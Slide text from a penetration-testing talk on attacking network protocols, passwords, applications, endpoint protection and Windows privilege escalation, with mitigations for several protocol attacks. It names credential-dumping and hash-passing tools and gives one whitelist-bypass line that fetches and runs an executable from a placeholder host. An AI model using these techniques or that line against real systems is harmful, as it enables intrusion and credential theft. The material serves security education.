SlideShare una empresa de Scribd logo

Attack All the Layers - What's Working in Penetration Testing

NetSPI
NetSPI

The document discusses techniques for attacking different layers during a penetration test. It covers attacking protocols like ARP, NBNS, SMB, PXE and DTP. It also discusses attacking passwords by cracking hashes, dictionary attacks, and dumping passwords in cleartext. Additionally, it covers attacking applications, bypassing endpoint protection, and escalating privileges on Windows systems locally and within a domain. The overall message is that penetration testers should attack all layers of the stack during a test to fully evaluate security.

Tecnología
1 de 58
Attack All the Layers: What’s Working During Pen Tests Scott Sutherland and Karl Fosaaen
Introductions • Scott Sutherland ‒ Principal Security Consultant @ NetSPI ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant @ NetSPI ‒ Twitter: @kfosaaen We specialize in both things and stuff!
Overview • Why do Companies Pen Test? • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation • Conclusions
Why do companies pen test? • Compliance requirements • Evaluate risks associated with an acquisition or partnership • Validate preventative controls • Validate detective controls • Prioritize internal security initiatives • Proactively prevent breaches
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Attacking protocols • ARP: Address Resolution Protocol • NBNS: NetBIOS Name Service • SMB: Server Message Block • PXE: Preboot Execution Environment • DTP: Dynamic Trunking Protocol
Attacking protocols: ARP Address Resolution Protocol
Attacking protocols: ARP • General ‒MAC to IP association ‒Layer 2 • Conditions ‒Independent of user action ‒Broadcast network • Attacks ‒MITM Monitoring ‒MITM Injection ‒DOS
Attacking protocols: ARP
Attacking protocols: ARP • Common mitigating controls: ‒ Dynamic ARP Inspection ‒ Port Security ‒ Static Routes (not recommended)
Attacking protocols: NBNS / LLMNR NetBIOS Name Service
Attacking protocols: NBNS • General ‒ IP to hostname association ‒ Layer 5 / 7 • Constraints ‒ Dependent on user action ‒ Broadcast Network ‒ Windows Only • Attacks ‒ MITM Monitoring ‒ MITM Injection ‒ DOS
Attacking protocols: NBNS
Attacking protocols: NBNS
Attacking protocols: NBNS
Attacking protocols: NBNS • Common mitigating controls: ‒ Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS ‒ Disable NBNS (recommended) • Might cause issues with legacy apps ‒ Disable insecure authentication to help • limit impact of exposed hashes ‒ Enable packet signing to help prevent • SMB Relay attacks
Attacking protocols: SMB Server Message Block
Attacking protocols: SMB • General ‒ SMB is the come back kid! ‒ Layer 7 • Constraints ‒ Dependent on user action ‒ Any routable network ‒ No connecting back to originating host • Attacks ‒ Command execution ‒ Shells..aaand shells
Attacking protocols: SMB
Attacking protocols: SMB • Historically, SMB Relay has been used to: ‒ Execute arbitrary commands ‒ Obtain shells • Lately the community has been developing tools for doing things like: ‒ LDAP queries ‒ SQL queries ‒ Exchange services ‒ Mounting file systems
Attacking protocols: SMB • Common mitigating controls: ‒ Enable packet signing to help prevent SMB Relay attacks ‒ Apply really old patches like if you missed out on the last decade…
Attacking protocols: PXE Preboot eXecution Environment
Attacking protocols: PXE • General ‒ DHCP • Constraints ‒ Broadcast domain • Attacks ‒ Command execution ‒ Access to file system/images
Attacking protocols: PXE • Common mitigating controls: ‒ Isolate networks ‒ Add device validation
Attacking protocols: DTP Dynamic Trunking Protocol
Attacking protocols: DTP • General ‒ 802.1Q encapsulation is in use ‒ Layer 2 • Constraints ‒ Independent of user action ‒ Trunking is set to enabled • or auto on switch port • Attacks ‒ Monitor network traffic for all VLANs, because all VLANs are • allowed on a trunk by default • *Full VLAN hopping
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP • Common mitigating controls: ‒ Use dedicated VLAN ID for all trunking ports ‒ Disable all unused ports and place them on a non-routable VLAN ‒ Configure all user ports as access ports to prevent trunk negotiation ‒ Configure frames with two 802.1Q headers ‒ Configure strong VACLs
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Attacking passwords • Hashes and Cracking (Offline) • Dictionary Attacks (Online) • Dump in Cleartext!
Attacking Passwords Tool Function Year Pass the Hash Passing Hashes 1997 Rainbow Tables Password Cracking 2000s SMB Relay Relaying Captured Hashes 2001 John the Ripper Password Cracking 2001 NetNTLM.pl Cracking Network Hashes 2007 PTH Toolkit Pass all the Hashes 2008 Hashcat CPU and GPU Cracking 2010 WCE and Mimikatz Cleartext Windows Creds 2012
Attacking Passwords: Hashes • What are hashes? ‒ A non-reversible way of storing passwords ‒ Operating systems and applications ‒ Lots of types • LM/NTLM • Network and Local • MD5 • SHA • descrypt
Attacking Passwords: Hashes • How do we get hashes? ‒ Cain and Abel ‒ fgdump ‒ Metasploit ‒ Mimikatz ‒ Databases ‒ Config files
Attacking Passwords: Cracking • Cracking Hashes ‒ Rainbow Tables ‒ John the Ripper ‒ oclHashcat ‒ CPU versus GPU
Attacking Passwords: Cracking 0 100 200 300 400 500 600 Minutes for Six Character Brute Force CPU GPU
Attacking Passwords: CrackingGPUCPU
Attacking Passwords: Passing Hashes • Passing Hashes ‒ Metasploit ‒ psexec ‒ winexec ‒ PTH toolkit
Attacking Passwords: Dictionary • Online Vs. Offline Attacks • Dictionary Attacks ‒ Enumerate users • Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc. ‒ Attack! • Are users getting smarter? ‒ Sort of… • “Summer2014” meets password • complexity requirements
Attacking Passwords: Cleartext • Common application configs • Reversible Formats ‒ Find in files ‒ Groups.xml ‒ Unattend.xml ‒ Registry • WCE • Mimikatz
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Attacking Applications: Common • Default and weak passwords • SQL injection • RFI/web shells • Web directory traversals • UNC path injection + SMB relay • Critical missing patches
Attacking Applications: Breakouts • Obtain a common dialog box • Bypass folder path and file type restrictions • Bypass file execution restrictions • Bypass file black/white lists • Access to native consoles and management tools • Downloading and use third party applications
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Bypassing EPP: Anti-virus • PowerShell code Injection • Execute off network share • Clone resource tables • Modify import tables • Pack files
Bypassing EPP: App White List • Execution via approved apps ‒ Powershell Code Injection ‒ Rundll32 mydll,DLLMain@12 ‒ IEExec http://x.x.x.x:8080/bypass.exe • Exceptions ‒ File name ‒ Publisher ‒ Directory • Excessive privileges ‒ Services and policy
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Windows Escalation: Overview • Privilege Escalation Goals • Local Privilege Escalation • Domain Privilege Escalation
Windows Escalation: Goals • Local Escalation Goals ‒ Find clear text or reversible credentials with local administrative privileges ‒ Get application to run commands as Administrator or LocalSystem • Domain Escalation Goals ‒ Find Domain Admins ‒ Impersonate Domain Admins
Windows Escalation: Local • Local Escalation ‒ *Clear text credentials in files, registry, over network ‒ Insecure service paths ‒ DLL preloading ‒ DLL and exe replacement ‒ Binary planting in auto-run locations (reg and file system) ‒ Modifying schedule tasks ‒ *Local and remote exploits ‒ Leverage local application like IIS, SQL Server etc ‒ *UNC path injection + SMB Relay / Capture + crack
Windows Escalation: Domain • Domain Escalation – Find DAs ‒ Check locally! (Processes, Tokens, Cachedump) ‒ Review active sessions – netsess (veil) ‒ Review remote processes - tasklist ‒ Service Principal Names (SPN) – get-spn ‒ Scanning Remote Systems for NetBIOS Information - nbtscan ‒ Pass the hash to other systems ‒ PowerShell shell spraying ‒ WINRM/WINRS shell spraying ‒ Psexec shell spraying
Windows Escalation: Domain • Domain Escalation – Impersonate DAs ‒ Dump passwords from memory with Mimikatz ‒ Migrate into the Domain Admin’s process ‒ Steal Domain Admins delegation tokens with Incognito ‒ Dump cached domain admin hashes with cachedump ‒ Relatively new techniques • PTH using Kerberos ticket
Conclusions • Most Networks ‒ Kind of broken • Most Protocols ‒ Kind of broken • Most Applications ‒ Kind of broken All can kind of be fixed
Attack all the layers! • Any questions?
Attack all the layers! • Scott Sutherland ‒ Principal Security Consultant ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant ‒ Twitter: @kfosaaen

Recomendados

Extracting Credentials From Windows
Extracting Credentials From WindowsExtracting Credentials From Windows
Extracting Credentials From Windows
NetSPI
 
Fuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingFuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox Testing
NetSPI
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015
NetSPI
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
NetSPI
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
NetSPI
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
NetSPI
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
Scott Sutherland
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products
NCC Group
 

Recomendados

Extracting Credentials From Windows
Extracting Credentials From WindowsExtracting Credentials From Windows
Extracting Credentials From Windows
NetSPI
 
Fuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingFuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox Testing
NetSPI
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015
NetSPI
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
NetSPI
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
NetSPI
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
NetSPI
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
Scott Sutherland
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products
NCC Group
 
Reverse_Engineering_Thick-clients
Reverse_Engineering_Thick-clientsReverse_Engineering_Thick-clients
Reverse_Engineering_Thick-clients
Steve Markey
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
Scott Sutherland
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Priyanka Aash
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Priyanka Aash
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
Sam Bowne
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
EC-Council
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)
NCC Group
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
Beau Bullock
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
Xavier Ashe
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Exploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removedExploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removed
NCC Group
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
Chris Gates
 
CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3
Sam Bowne
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Damon Small
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the Cheap
NetSPI
 
Oscp preparation
Oscp preparationOscp preparation
Oscp preparation
Manich Koomsusi
 

Más contenido relacionado

La actualidad más candente

Reverse_Engineering_Thick-clients
Reverse_Engineering_Thick-clientsReverse_Engineering_Thick-clients
Reverse_Engineering_Thick-clients
Steve Markey
 
How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)
NCC Group
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
Beau Bullock
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
Xavier Ashe
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 

La actualidad más candente (19)

Reverse_Engineering_Thick-clients
Reverse_Engineering_Thick-clientsReverse_Engineering_Thick-clients
Reverse_Engineering_Thick-clients
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Exploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removedExploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removed
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 
CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 

Destacado

GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the Cheap
NetSPI
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
NetSPI
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
NetSPI
 

Destacado (6)

Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability Assessment
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the Cheap
 
Oscp preparation
Oscp preparationOscp preparation
Oscp preparation
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
 
Thick client application security assessment
Thick client application security assessmentThick client application security assessment
Thick client application security assessment
 

Similar a Attack All the Layers - What's Working in Penetration Testing

Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
Scott Sutherland
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
Ajay Choudhary
 

Similar a Attack All the Layers - What's Working in Penetration Testing (20)

Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
CNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS VulnerabilitesCNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS Vulnerabilites
 
Ch 8: Desktop and Server OS Vulnerabilites
Ch 8: Desktop and Server OS VulnerabilitesCh 8: Desktop and Server OS Vulnerabilites
Ch 8: Desktop and Server OS Vulnerabilites
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
 
CNIT 123 Ch 8: OS Vulnerabilities
CNIT 123 Ch 8: OS VulnerabilitiesCNIT 123 Ch 8: OS Vulnerabilities
CNIT 123 Ch 8: OS Vulnerabilities
 
CNIT 123 8: Desktop and Server OS Vulnerabilities
CNIT 123 8: Desktop and Server OS VulnerabilitiesCNIT 123 8: Desktop and Server OS Vulnerabilities
CNIT 123 8: Desktop and Server OS Vulnerabilities
 
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
 
Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
QA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QAQA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QA
 
Database Firewall with Snort
Database Firewall with SnortDatabase Firewall with Snort
Database Firewall with Snort
 
Codefest2015
Codefest2015Codefest2015
Codefest2015
 
A Byte of Software Deployment
A Byte of Software DeploymentA Byte of Software Deployment
A Byte of Software Deployment
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server Security
 
Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019
 
TTL Alfresco Product Security and Best Practices 2017
TTL Alfresco Product Security and Best Practices 2017TTL Alfresco Product Security and Best Practices 2017
TTL Alfresco Product Security and Best Practices 2017
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)
 

Último

Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 

Último (20)

Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
